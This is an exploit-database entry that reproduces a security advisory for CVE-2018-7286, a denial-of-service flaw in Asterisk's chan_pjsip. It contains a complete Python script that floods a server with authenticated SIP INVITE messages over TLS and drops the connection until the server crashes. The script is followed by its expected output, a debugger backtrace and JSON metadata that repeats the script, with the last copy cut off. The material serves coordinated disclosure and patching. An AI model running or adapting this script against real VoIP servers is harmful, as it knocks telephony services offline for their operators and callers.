Asterisk chan_pjsip 15.2.0 - INVITE Denial of Service
2018-02-27T00:00:00
ID EXPLOITPACK:5E0056701181B58A00B53B40BB14766A Type exploitpack Reporter EnableSecurity Modified 2018-02-27T00:00:00
Description
Asterisk chan_pjsip 15.2.0 - INVITE Denial of Service
'''
# Crash occurs when sending a repeated number of INVITE messages over TCP or TLS transport
- Authors:
- Alfred Farrugia <alfred@enablesecurity.com>
- Sandro Gauci <sandro@enablesecurity.com>
- Latest vulnerable version: Asterisk 15.2.0 running `chan_pjsip` installed with `--with-pjproject-bundled`
- References: AST-2018-005, CVE-2018-7286
- Enable Security Advisory: <https://github.com/EnableSecurity/advisories/tree/master/ES2018-04-asterisk-pjsip-tcp-segfault>
- Vendor Advisory: <http://downloads.asterisk.org/pub/security/AST-2018-005.html>
- Tested vulnerable versions: 15.2.0, 15.1.0, 15.0.0, 13.19.0, 13.11.2, 14.7.5
- Timeline:
- Issue reported to vendor: 2018-01-24
- Vendor patch made available to us: 2018-02-05
- Vendor advisory published: 2018-02-21
- Enable Security advisory: 2018-02-22
## Description
A crash occurs when a number of INVITE messages are sent over TCP or TLS and
then the connection is suddenly closed. This issue leads to a segmentation fault.
## Impact
Abuse of this vulnerability leads to denial of service in Asterisk when
`chan_pjsip` is in use.
## How to reproduce the issue
The following script was used to reproduce the issue on a TLS connection:
'''
python
import md5
import re
import socket
import ssl
import uuid
from time import sleep
SERVER_IP = "127.0.0.1"
SERVER_PORT = 5061
USERNAME = "3000"
PASSWORD = "3000"
INVITE_USERNAME = "3000"
errno = 0
lasterrno = 0
while True:
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock = ssl.wrap_socket(sock,
ssl_version=ssl.PROTOCOL_TLSv1,
)
sock.connect((SERVER_IP, SERVER_PORT))
sock.settimeout(0.5)
errno = 0
callid = str(uuid.uuid4())
for ix in range(10):
sdpbody = ""
msg = "INVITE sip:%s@%s:%i SIP/2.0\r\n" \
"To: <sip:%s@%s:%i>\r\n" \
"From: Test <sip:%s@%s:%s>\r\n" \
"Call-ID: %s\r\n" \
"CSeq: 2 INVITE\r\n" \
"Via: SIP/2.0/TLS 172.17.0.1:10394;branch=z9hG4bK%s\r\n" \
"Contact: <sip:%s@172.17.0.1>\r\n" \
"Content-Type: application/sdp\r\n" \
"{{AUTH}}" \
"Content-Length: %i\r\n" \
"\r\n" % (
INVITE_USERNAME, SERVER_IP, SERVER_PORT,
INVITE_USERNAME, SERVER_IP, SERVER_PORT,
USERNAME, SERVER_IP, SERVER_PORT,
callid, callid,
USERNAME, len(sdpbody)
) + \
sdpbody
sock.sendall(msg.replace("{{AUTH}}", ""))
data = sock.recv(10240)
# print(data)
if data.startswith("SIP/2.0 401"):
for line in data.split('\r\n'):
if line.startswith("WWW-Authenticate"):
content = line.split(':', 2)[1].strip()
realm = re.search(
"realm=\"([a-z]+)\"", content).group(1)
nonce = re.search(
"nonce=\"([a-z0-9\/]+)\"", content).group(1)
ha1 = md5.new(USERNAME + ":" + realm +
":" + PASSWORD).hexdigest()
uri = "sip:%s:%i" % (SERVER_IP, SERVER_PORT)
ha2 = md5.new("INVITE:" + uri).hexdigest()
r = md5.new(ha1 + ":" + nonce + ":" + ha2).hexdigest()
auth = "Authorization: Digest username=\"%s\"," % (USERNAME) + \
"realm=\"%s\"," % (realm) + \
"nonce=\"%s\"," % (nonce) + \
"uri=\"%s\"," % (uri) + \
"response=\"%s\"," % (r) + \
"algorithm=md5\r\n"
print(auth)
sock.sendall(msg.replace("{{AUTH}}", auth))
errno = 0
except (socket.error, ssl.SSLEOFError), err:
print(err)
print("getting close!")
sleep(2)
errno += 1
if errno >= 10:
print("confirmed dead")
break
elif errno > lasterrno:
lasterrno = errno
continue
'''
The output from the tool should show the following:
```
> python test.py
Authorization: Digest username="3000",realm="asterisk",nonce="1516728889/07e2e34fbd45ed7f6b1bca0d2bde50ae",uri="sip:127.0.0.1:5061",response="a2b7e2bfa722730b64787664db474f2a",algorithm=md5
EOF occurred in violation of protocol (_ssl.c:590)
getting close!
[Errno 111] Connection refused
getting close!
[Errno 111] Connection refused
getting close!
[Errno 111] Connection refused
getting close!
[Errno 111] Connection refused
getting close!
[Errno 111] Connection refused
getting close!
[Errno 111] Connection refused
getting close!
[Errno 111] Connection refused
getting close!
[Errno 111] Connection refused
getting close!
[Errno 111] Connection refused
getting close!
confirmed dead
```
Notes:
- authentication may be required
- the destination SIP address should match a valid extension in the dialplan
- similar code to the above can be used to reproduce the issue on TCP transport
### GDB backtrace result
```
gdb --args /opt/asterisk/sbin/asterisk -fcvvv
Thread 25 "asterisk" received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7ffff030a700 (LWP 133)]
ast_sip_failover_request (tdata=0x0) at res_pjsip.c:3956
3956 if (!tdata->dest_info.addr.count || (tdata->dest_info.cur_addr == tdata->dest_info.addr.count - 1)) {
(gdb) bt
#0 ast_sip_failover_request (tdata=0x0) at res_pjsip.c:3956
#1 0x00007ffff1a8dbb1 in check_request_status (inv=inv@entry=0x7fff9910bac8, e=0x7ffff0308ae0) at res_pjsip_session.c:3371
#2 0x00007ffff1a8dc83 in session_inv_on_state_changed (inv=0x7fff9910bac8, e=0x7ffff0308ae0) at res_pjsip_session.c:3455
#3 0x00007ffff7848217 in inv_set_state (state=PJSIP_INV_STATE_DISCONNECTED, e=0x7ffff0308ae0, inv=0x7fff9910bac8) at ../src/pjsip-ua/sip_inv.c:317
#4 inv_on_state_null (inv=0x7fff9910bac8, e=0x7ffff0308ae0) at ../src/pjsip-ua/sip_inv.c:3890
#5 0x00007ffff7841a77 in mod_inv_on_tsx_state (tsx=0x7fff99116408, e=0x7ffff0308ae0) at ../src/pjsip-ua/sip_inv.c:717
#6 0x00007ffff788299d in pjsip_dlg_on_tsx_state (dlg=0x7fff990eccc8, tsx=0x7fff99116408, e=0x7ffff0308ae0) at ../src/pjsip/sip_dialog.c:2066
#7 0x00007ffff787b513 in tsx_set_state (tsx=0x7fff99116408, state=PJSIP_TSX_STATE_TERMINATED, event_src_type=PJSIP_EVENT_TRANSPORT_ERROR, event_src=0x7fff9910fda8, flag=0)
at ../src/pjsip/sip_transaction.c:1267
#8 0x00007ffff787cfec in send_msg_callback (send_state=0x7fff9918d2f0, sent=-171064, cont=0x7ffff0308c04) at ../src/pjsip/sip_transaction.c:1970
#9 0x00007ffff78661ae in send_response_resolver_cb (status=<optimized out>, token=0x7fff9918d2f0, addr=0x7ffff0308c60) at ../src/pjsip/sip_util.c:1721
#10 0x00007ffff184df8c in sip_resolve (resolver=<optimized out>, pool=<optimized out>, target=0x7fff99116530, token=0x7fff9918d2f0, cb=0x7ffff78660f0 <send_response_resolver_cb>)
at res_pjsip/pjsip_resolver.c:527
#11 0x00007ffff7869adb in pjsip_resolve (resolver=0x1b64d40, pool=<optimized out>, target=target@entry=0x7fff99116530, token=token@entry=0x7fff9918d2f0,
cb=cb@entry=0x7ffff78660f0 <send_response_resolver_cb>) at ../src/pjsip/sip_resolve.c:209
#12 0x00007ffff78652b9 in pjsip_endpt_resolve (endpt=endpt@entry=0x1638d28, pool=<optimized out>, target=target@entry=0x7fff99116530, token=token@entry=0x7fff9918d2f0,
cb=cb@entry=0x7ffff78660f0 <send_response_resolver_cb>) at ../src/pjsip/sip_endpoint.c:1164
#13 0x00007ffff7867fe1 in pjsip_endpt_send_response (endpt=0x1638d28, res_addr=res_addr@entry=0x7fff99116508, tdata=tdata@entry=0x7fff9910fda8, token=token@entry=0x7fff99116408,
cb=cb@entry=0x7ffff787cd80 <send_msg_callback>) at ../src/pjsip/sip_util.c:1796
#14 0x00007ffff787bdac in tsx_send_msg (tsx=0x7fff99116408, tdata=0x7fff9910fda8) at ../src/pjsip/sip_transaction.c:2237
#15 0x00007ffff787dc67 in tsx_on_state_proceeding_uas (event=0x7ffff0309b30, tsx=0x7fff99116408) at ../src/pjsip/sip_transaction.c:2704
#16 tsx_on_state_trying (tsx=0x7fff99116408, event=0x7ffff0309b30) at ../src/pjsip/sip_transaction.c:2634
#17 0x00007ffff787fba7 in pjsip_tsx_send_msg (tsx=tsx@entry=0x7fff99116408, tdata=tdata@entry=0x7fff9910fda8) at ../src/pjsip/sip_transaction.c:1789
#18 0x00007ffff78822a3 in pjsip_dlg_send_response (dlg=0x7fff990eccc8, tsx=0x7fff99116408, tdata=tdata@entry=0x7fff9910fda8) at ../src/pjsip/sip_dialog.c:1531
#19 0x00007ffff784519a in pjsip_inv_send_msg (inv=0x7fff9910bac8, tdata=0x7fff9910fda8) at ../src/pjsip-ua/sip_inv.c:3231
#20 0x00007ffff1a8c043 in ast_sip_session_send_response (session=session@entry=0x7fff9910e208, tdata=<optimized out>) at res_pjsip_session.c:1712
#21 0x00007ffff1a8ec09 in new_invite (invite=<synthetic pointer>) at res_pjsip_session.c:2963
#22 handle_new_invite_request (rdata=0x7fff9524ce58) at res_pjsip_session.c:3062
#23 session_on_rx_request (rdata=0x7fff9524ce58) at res_pjsip_session.c:3126
#24 0x00007ffff7864e97 in pjsip_endpt_process_rx_data (endpt=<optimized out>, rdata=rdata@entry=0x7fff9524ce58, p=p@entry=0x7ffff1a7ed00 <param>,
p_handled=p_handled@entry=0x7ffff0309d44) at ../src/pjsip/sip_endpoint.c:893
#25 0x00007ffff185427f in distribute (data=0x7fff9524ce58) at res_pjsip/pjsip_distributor.c:903
#26 0x00000000005fc6fe in ast_taskprocessor_execute (tps=tps@entry=0x1cf2b08) at taskprocessor.c:963
#27 0x0000000000603960 in execute_tasks (data=0x1cf2b08) at threadpool.c:1322
#28 0x00000000005fc6fe in ast_taskprocessor_execute (tps=0x16343d8) at taskprocessor.c:963
#29 0x0000000000603e40 in threadpool_execute (pool=0x1637b78) at threadpool.c:351
#30 worker_active (worker=0x7fffa0000948) at threadpool.c:1105
#31 worker_start (arg=arg@entry=0x7fffa0000948) at threadpool.c:1024
#32 0x000000000060eddd in dummy_start (data=<optimized out>) at utils.c:1257
#33 0x00007ffff5e366ba in start_thread (arg=0x7ffff030a700) at pthread_create.c:333
#34 0x00007ffff541f3dd in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:109
(gdb)
```
## Solutions and recommendations
Apply the patch issued by Asterisk at <http://www.asterisk.org/security> or upgrade to the latest release.
## About Enable Security
[Enable Security](https://www.enablesecurity.com) provides Information Security services, including Penetration Testing, Research and Development, to help protect client networks and applications against online attackers.
## Disclaimer
The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
'''
{"lastseen": "2020-04-01T19:04:05", "references": [], "description": "\nAsterisk chan_pjsip 15.2.0 - INVITE Denial of Service", "edition": 1, "reporter": "EnableSecurity", "exploitpack": {"type": "dos", "platform": "linux"}, "published": "2018-02-27T00:00:00", "title": "Asterisk chan_pjsip 15.2.0 - INVITE Denial of Service", "type": "exploitpack", "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-7286"]}, {"type": "zdt", "idList": ["1337DAY-ID-29889"]}, {"type": "exploitdb", "idList": ["EDB-ID:44181"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146580"]}, {"type": "nessus", "idList": ["FREEBSD_PKG_933654CE17B811E890B8001999F8D30B.NASL", "ASTERISK_AST_2018_001-006.NASL", "ASTERISK_AST_2018_002-005.NASL", "DEBIAN_DSA-4320.NASL"]}, {"type": "freebsd", "idList": ["933654CE-17B8-11E8-90B8-001999F8D30B"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310140792", "OPENVAS:1361412562310704320"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4320-1:78762"]}], "modified": "2020-04-01T19:04:05", "rev": 2}, "score": {"value": 5.1, "vector": "NONE", "modified": "2020-04-01T19:04:05", "rev": 2}, "vulnersScore": 5.1}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-7286"], "modified": "2018-02-27T00:00:00", "id": "EXPLOITPACK:5E0056701181B58A00B53B40BB14766A", "href": "", "viewCount": 1, "sourceData": "'''\n# Crash occurs when sending a repeated number of INVITE messages over TCP or TLS transport\n\n- Authors:\n - Alfred Farrugia <alfred@enablesecurity.com>\n - Sandro Gauci <sandro@enablesecurity.com>\n- Latest vulnerable version: Asterisk 15.2.0 running `chan_pjsip` installed with `--with-pjproject-bundled`\n- References: AST-2018-005, CVE-2018-7286\n- Enable Security Advisory: <https://github.com/EnableSecurity/advisories/tree/master/ES2018-04-asterisk-pjsip-tcp-segfault>\n- Vendor Advisory: <http://downloads.asterisk.org/pub/security/AST-2018-005.html>\n- Tested vulnerable versions: 15.2.0, 15.1.0, 15.0.0, 13.19.0, 13.11.2, 14.7.5\n- Timeline:\n - Issue reported to vendor: 2018-01-24\n - Vendor patch made available to us: 2018-02-05\n - Vendor advisory published: 2018-02-21\n - Enable Security advisory: 2018-02-22\n\n## Description\n\nA crash occurs when a number of INVITE messages are sent over TCP or TLS and\nthen the connection is suddenly closed. This issue leads to a segmentation fault. \n\n## Impact\n\nAbuse of this vulnerability leads to denial of service in Asterisk when\n`chan_pjsip` is in use.\n\n## How to reproduce the issue\n\nThe following script was used to reproduce the issue on a TLS connection:\n'''\n\npython\nimport md5\nimport re\nimport socket\nimport ssl\nimport uuid\nfrom time import sleep\n\nSERVER_IP = \"127.0.0.1\"\nSERVER_PORT = 5061\nUSERNAME = \"3000\"\nPASSWORD = \"3000\"\nINVITE_USERNAME = \"3000\"\n\nerrno = 0\nlasterrno = 0\nwhile True:\n try:\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock = ssl.wrap_socket(sock,\n ssl_version=ssl.PROTOCOL_TLSv1,\n )\n\n sock.connect((SERVER_IP, SERVER_PORT))\n sock.settimeout(0.5)\n errno = 0\n callid = str(uuid.uuid4())\n for ix in range(10):\n sdpbody = \"\"\n\n msg = \"INVITE sip:%s@%s:%i SIP/2.0\\r\\n\" \\\n \"To: <sip:%s@%s:%i>\\r\\n\" \\\n \"From: Test <sip:%s@%s:%s>\\r\\n\" \\\n \"Call-ID: %s\\r\\n\" \\\n \"CSeq: 2 INVITE\\r\\n\" \\\n \"Via: SIP/2.0/TLS 172.17.0.1:10394;branch=z9hG4bK%s\\r\\n\" \\\n \"Contact: <sip:%s@172.17.0.1>\\r\\n\" \\\n \"Content-Type: application/sdp\\r\\n\" \\\n \"{{AUTH}}\" \\\n \"Content-Length: %i\\r\\n\" \\\n \"\\r\\n\" % (\n INVITE_USERNAME, SERVER_IP, SERVER_PORT,\n INVITE_USERNAME, SERVER_IP, SERVER_PORT,\n USERNAME, SERVER_IP, SERVER_PORT,\n callid, callid,\n USERNAME, len(sdpbody)\n ) + \\\n sdpbody\n\n sock.sendall(msg.replace(\"{{AUTH}}\", \"\"))\n\n data = sock.recv(10240)\n # print(data)\n if data.startswith(\"SIP/2.0 401\"):\n for line in data.split('\\r\\n'):\n if line.startswith(\"WWW-Authenticate\"):\n content = line.split(':', 2)[1].strip()\n realm = re.search(\n \"realm=\\\"([a-z]+)\\\"\", content).group(1)\n nonce = re.search(\n \"nonce=\\\"([a-z0-9\\/]+)\\\"\", content).group(1)\n ha1 = md5.new(USERNAME + \":\" + realm +\n \":\" + PASSWORD).hexdigest()\n uri = \"sip:%s:%i\" % (SERVER_IP, SERVER_PORT)\n ha2 = md5.new(\"INVITE:\" + uri).hexdigest()\n r = md5.new(ha1 + \":\" + nonce + \":\" + ha2).hexdigest()\n\n auth = \"Authorization: Digest username=\\\"%s\\\",\" % (USERNAME) + \\\n \"realm=\\\"%s\\\",\" % (realm) + \\\n \"nonce=\\\"%s\\\",\" % (nonce) + \\\n \"uri=\\\"%s\\\",\" % (uri) + \\\n \"response=\\\"%s\\\",\" % (r) + \\\n \"algorithm=md5\\r\\n\"\n print(auth)\n\n sock.sendall(msg.replace(\"{{AUTH}}\", auth))\n errno = 0\n except (socket.error, ssl.SSLEOFError), err:\n print(err)\n print(\"getting close!\")\n sleep(2)\n errno += 1\n if errno >= 10:\n print(\"confirmed dead\")\n break\n elif errno > lasterrno:\n lasterrno = errno\n continue\n\n'''\nThe output from the tool should show the following:\n\n```\n> python test.py\nAuthorization: Digest username=\"3000\",realm=\"asterisk\",nonce=\"1516728889/07e2e34fbd45ed7f6b1bca0d2bde50ae\",uri=\"sip:127.0.0.1:5061\",response=\"a2b7e2bfa722730b64787664db474f2a\",algorithm=md5\n\nEOF occurred in violation of protocol (_ssl.c:590)\ngetting close!\n[Errno 111] Connection refused\ngetting close!\n[Errno 111] Connection refused\ngetting close!\n[Errno 111] Connection refused\ngetting close!\n[Errno 111] Connection refused\ngetting close!\n[Errno 111] Connection refused\ngetting close!\n[Errno 111] Connection refused\ngetting close!\n[Errno 111] Connection refused\ngetting close!\n[Errno 111] Connection refused\ngetting close!\n[Errno 111] Connection refused\ngetting close!\nconfirmed dead\n```\n\nNotes:\n\n- authentication may be required\n- the destination SIP address should match a valid extension in the dialplan\n- similar code to the above can be used to reproduce the issue on TCP transport\n\n\n### GDB backtrace result\n\n```\ngdb --args /opt/asterisk/sbin/asterisk -fcvvv\n\nThread 25 \"asterisk\" received signal SIGSEGV, Segmentation fault.\n[Switching to Thread 0x7ffff030a700 (LWP 133)]\nast_sip_failover_request (tdata=0x0) at res_pjsip.c:3956\n3956 if (!tdata->dest_info.addr.count || (tdata->dest_info.cur_addr == tdata->dest_info.addr.count - 1)) {\n(gdb) bt\n#0 ast_sip_failover_request (tdata=0x0) at res_pjsip.c:3956\n#1 0x00007ffff1a8dbb1 in check_request_status (inv=inv@entry=0x7fff9910bac8, e=0x7ffff0308ae0) at res_pjsip_session.c:3371\n#2 0x00007ffff1a8dc83 in session_inv_on_state_changed (inv=0x7fff9910bac8, e=0x7ffff0308ae0) at res_pjsip_session.c:3455\n#3 0x00007ffff7848217 in inv_set_state (state=PJSIP_INV_STATE_DISCONNECTED, e=0x7ffff0308ae0, inv=0x7fff9910bac8) at ../src/pjsip-ua/sip_inv.c:317\n#4 inv_on_state_null (inv=0x7fff9910bac8, e=0x7ffff0308ae0) at ../src/pjsip-ua/sip_inv.c:3890\n#5 0x00007ffff7841a77 in mod_inv_on_tsx_state (tsx=0x7fff99116408, e=0x7ffff0308ae0) at ../src/pjsip-ua/sip_inv.c:717\n#6 0x00007ffff788299d in pjsip_dlg_on_tsx_state (dlg=0x7fff990eccc8, tsx=0x7fff99116408, e=0x7ffff0308ae0) at ../src/pjsip/sip_dialog.c:2066\n#7 0x00007ffff787b513 in tsx_set_state (tsx=0x7fff99116408, state=PJSIP_TSX_STATE_TERMINATED, event_src_type=PJSIP_EVENT_TRANSPORT_ERROR, event_src=0x7fff9910fda8, flag=0)\n at ../src/pjsip/sip_transaction.c:1267\n#8 0x00007ffff787cfec in send_msg_callback (send_state=0x7fff9918d2f0, sent=-171064, cont=0x7ffff0308c04) at ../src/pjsip/sip_transaction.c:1970\n#9 0x00007ffff78661ae in send_response_resolver_cb (status=<optimized out>, token=0x7fff9918d2f0, addr=0x7ffff0308c60) at ../src/pjsip/sip_util.c:1721\n#10 0x00007ffff184df8c in sip_resolve (resolver=<optimized out>, pool=<optimized out>, target=0x7fff99116530, token=0x7fff9918d2f0, cb=0x7ffff78660f0 <send_response_resolver_cb>)\n at res_pjsip/pjsip_resolver.c:527\n#11 0x00007ffff7869adb in pjsip_resolve (resolver=0x1b64d40, pool=<optimized out>, target=target@entry=0x7fff99116530, token=token@entry=0x7fff9918d2f0,\n cb=cb@entry=0x7ffff78660f0 <send_response_resolver_cb>) at ../src/pjsip/sip_resolve.c:209\n#12 0x00007ffff78652b9 in pjsip_endpt_resolve (endpt=endpt@entry=0x1638d28, pool=<optimized out>, target=target@entry=0x7fff99116530, token=token@entry=0x7fff9918d2f0,\n cb=cb@entry=0x7ffff78660f0 <send_response_resolver_cb>) at ../src/pjsip/sip_endpoint.c:1164\n#13 0x00007ffff7867fe1 in pjsip_endpt_send_response (endpt=0x1638d28, res_addr=res_addr@entry=0x7fff99116508, tdata=tdata@entry=0x7fff9910fda8, token=token@entry=0x7fff99116408,\n cb=cb@entry=0x7ffff787cd80 <send_msg_callback>) at ../src/pjsip/sip_util.c:1796\n#14 0x00007ffff787bdac in tsx_send_msg (tsx=0x7fff99116408, tdata=0x7fff9910fda8) at ../src/pjsip/sip_transaction.c:2237\n#15 0x00007ffff787dc67 in tsx_on_state_proceeding_uas (event=0x7ffff0309b30, tsx=0x7fff99116408) at ../src/pjsip/sip_transaction.c:2704\n#16 tsx_on_state_trying (tsx=0x7fff99116408, event=0x7ffff0309b30) at ../src/pjsip/sip_transaction.c:2634\n#17 0x00007ffff787fba7 in pjsip_tsx_send_msg (tsx=tsx@entry=0x7fff99116408, tdata=tdata@entry=0x7fff9910fda8) at ../src/pjsip/sip_transaction.c:1789\n#18 0x00007ffff78822a3 in pjsip_dlg_send_response (dlg=0x7fff990eccc8, tsx=0x7fff99116408, tdata=tdata@entry=0x7fff9910fda8) at ../src/pjsip/sip_dialog.c:1531\n#19 0x00007ffff784519a in pjsip_inv_send_msg (inv=0x7fff9910bac8, tdata=0x7fff9910fda8) at ../src/pjsip-ua/sip_inv.c:3231\n#20 0x00007ffff1a8c043 in ast_sip_session_send_response (session=session@entry=0x7fff9910e208, tdata=<optimized out>) at res_pjsip_session.c:1712\n#21 0x00007ffff1a8ec09 in new_invite (invite=<synthetic pointer>) at res_pjsip_session.c:2963\n#22 handle_new_invite_request (rdata=0x7fff9524ce58) at res_pjsip_session.c:3062\n#23 session_on_rx_request (rdata=0x7fff9524ce58) at res_pjsip_session.c:3126\n#24 0x00007ffff7864e97 in pjsip_endpt_process_rx_data (endpt=<optimized out>, rdata=rdata@entry=0x7fff9524ce58, p=p@entry=0x7ffff1a7ed00 <param>,\n p_handled=p_handled@entry=0x7ffff0309d44) at ../src/pjsip/sip_endpoint.c:893\n#25 0x00007ffff185427f in distribute (data=0x7fff9524ce58) at res_pjsip/pjsip_distributor.c:903\n#26 0x00000000005fc6fe in ast_taskprocessor_execute (tps=tps@entry=0x1cf2b08) at taskprocessor.c:963\n#27 0x0000000000603960 in execute_tasks (data=0x1cf2b08) at threadpool.c:1322\n#28 0x00000000005fc6fe in ast_taskprocessor_execute (tps=0x16343d8) at taskprocessor.c:963\n#29 0x0000000000603e40 in threadpool_execute (pool=0x1637b78) at threadpool.c:351\n#30 worker_active (worker=0x7fffa0000948) at threadpool.c:1105\n#31 worker_start (arg=arg@entry=0x7fffa0000948) at threadpool.c:1024\n#32 0x000000000060eddd in dummy_start (data=<optimized out>) at utils.c:1257\n#33 0x00007ffff5e366ba in start_thread (arg=0x7ffff030a700) at pthread_create.c:333\n#34 0x00007ffff541f3dd in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:109\n(gdb)\n```\n\n## Solutions and recommendations\n\nApply the patch issued by Asterisk at <http://www.asterisk.org/security> or upgrade to the latest release.\n\n## About Enable Security\n\n[Enable Security](https://www.enablesecurity.com) provides Information Security services, including Penetration Testing, Research and Development, to help protect client networks and applications against online attackers.\n\n## Disclaimer\n\nThe information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.\n'''", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}
{"cve": [{"lastseen": "2020-12-09T20:25:46", "description": "An issue was discovered in Asterisk through 13.19.1, 14.x through 14.7.5, and 15.x through 15.2.1, and Certified Asterisk through 13.18-cert2. res_pjsip allows remote authenticated users to crash Asterisk (segmentation fault) by sending a number of SIP INVITE messages on a TCP or TLS connection and then suddenly closing the connection.", "edition": 9, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-02-22T00:29:00", "title": "CVE-2018-7286", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7286"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:digium:asterisk:14.7.5", "cpe:/a:digium:asterisk:13.19.1", "cpe:/a:digium:certified_asterisk:13.18", "cpe:/a:digium:asterisk:15.2.1", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2018-7286", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-7286", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:15.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:13.18:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:14.7.5:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.19.1:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2018-02-27T21:20:46", "description": "Asterisk chan_pjsip 15.2.0 - 'INVITE' Denial of Service. CVE-2018-7286. Dos exploit for Linux platform. Tags: Denial of Service (DoS)", "published": "2018-02-27T00:00:00", "type": "exploitdb", "title": "Asterisk chan_pjsip 15.2.0 - 'INVITE' Denial of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-7286"], "modified": "2018-02-27T00:00:00", "id": "EDB-ID:44181", "href": "https://www.exploit-db.com/exploits/44181/", "sourceData": "'''\r\n# Crash occurs when sending a repeated number of INVITE messages over TCP or TLS transport\r\n\r\n- Authors:\r\n - Alfred Farrugia <alfred@enablesecurity.com>\r\n - Sandro Gauci <sandro@enablesecurity.com>\r\n- Latest vulnerable version: Asterisk 15.2.0 running `chan_pjsip` installed with `--with-pjproject-bundled`\r\n- References: AST-2018-005, CVE-2018-7286\r\n- Enable Security Advisory: <https://github.com/EnableSecurity/advisories/tree/master/ES2018-04-asterisk-pjsip-tcp-segfault>\r\n- Vendor Advisory: <http://downloads.asterisk.org/pub/security/AST-2018-005.html>\r\n- Tested vulnerable versions: 15.2.0, 15.1.0, 15.0.0, 13.19.0, 13.11.2, 14.7.5\r\n- Timeline:\r\n - Issue reported to vendor: 2018-01-24\r\n - Vendor patch made available to us: 2018-02-05\r\n - Vendor advisory published: 2018-02-21\r\n - Enable Security advisory: 2018-02-22\r\n\r\n## Description\r\n\r\nA crash occurs when a number of INVITE messages are sent over TCP or TLS and\r\nthen the connection is suddenly closed. This issue leads to a segmentation fault. \r\n\r\n## Impact\r\n\r\nAbuse of this vulnerability leads to denial of service in Asterisk when\r\n`chan_pjsip` is in use.\r\n\r\n## How to reproduce the issue\r\n\r\nThe following script was used to reproduce the issue on a TLS connection:\r\n'''\r\n\r\npython\r\nimport md5\r\nimport re\r\nimport socket\r\nimport ssl\r\nimport uuid\r\nfrom time import sleep\r\n\r\nSERVER_IP = \"127.0.0.1\"\r\nSERVER_PORT = 5061\r\nUSERNAME = \"3000\"\r\nPASSWORD = \"3000\"\r\nINVITE_USERNAME = \"3000\"\r\n\r\nerrno = 0\r\nlasterrno = 0\r\nwhile True:\r\n try:\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n sock = ssl.wrap_socket(sock,\r\n ssl_version=ssl.PROTOCOL_TLSv1,\r\n )\r\n\r\n sock.connect((SERVER_IP, SERVER_PORT))\r\n sock.settimeout(0.5)\r\n errno = 0\r\n callid = str(uuid.uuid4())\r\n for ix in range(10):\r\n sdpbody = \"\"\r\n\r\n msg = \"INVITE sip:%s@%s:%i SIP/2.0\\r\\n\" \\\r\n \"To: <sip:%s@%s:%i>\\r\\n\" \\\r\n \"From: Test <sip:%s@%s:%s>\\r\\n\" \\\r\n \"Call-ID: %s\\r\\n\" \\\r\n \"CSeq: 2 INVITE\\r\\n\" \\\r\n \"Via: SIP/2.0/TLS 172.17.0.1:10394;branch=z9hG4bK%s\\r\\n\" \\\r\n \"Contact: <sip:%s@172.17.0.1>\\r\\n\" \\\r\n \"Content-Type: application/sdp\\r\\n\" \\\r\n \"{{AUTH}}\" \\\r\n \"Content-Length: %i\\r\\n\" \\\r\n \"\\r\\n\" % (\r\n INVITE_USERNAME, SERVER_IP, SERVER_PORT,\r\n INVITE_USERNAME, SERVER_IP, SERVER_PORT,\r\n USERNAME, SERVER_IP, SERVER_PORT,\r\n callid, callid,\r\n USERNAME, len(sdpbody)\r\n ) + \\\r\n sdpbody\r\n\r\n sock.sendall(msg.replace(\"{{AUTH}}\", \"\"))\r\n\r\n data = sock.recv(10240)\r\n # print(data)\r\n if data.startswith(\"SIP/2.0 401\"):\r\n for line in data.split('\\r\\n'):\r\n if line.startswith(\"WWW-Authenticate\"):\r\n content = line.split(':', 2)[1].strip()\r\n realm = 